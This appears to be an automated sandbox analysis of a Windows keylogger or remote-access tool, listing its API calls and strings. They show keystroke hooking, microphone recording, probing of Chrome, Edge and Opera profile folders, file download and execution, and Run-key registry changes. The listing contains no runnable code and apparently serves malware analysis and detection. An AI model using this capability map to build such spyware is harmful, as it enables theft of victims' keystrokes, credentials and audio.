                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Strings
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                    Strings
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Strings
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Strings
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Strings
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    APIs
                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                    Strings
                                    • String ID: uD
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                    Strings
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    APIs
                                    • ___initconout.LIBCMT ref: 0045555B
                                      • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                    Strings
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                    • GetLastError.KERNEL32 ref: 00440D35
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    • API ID: ErrorLastRead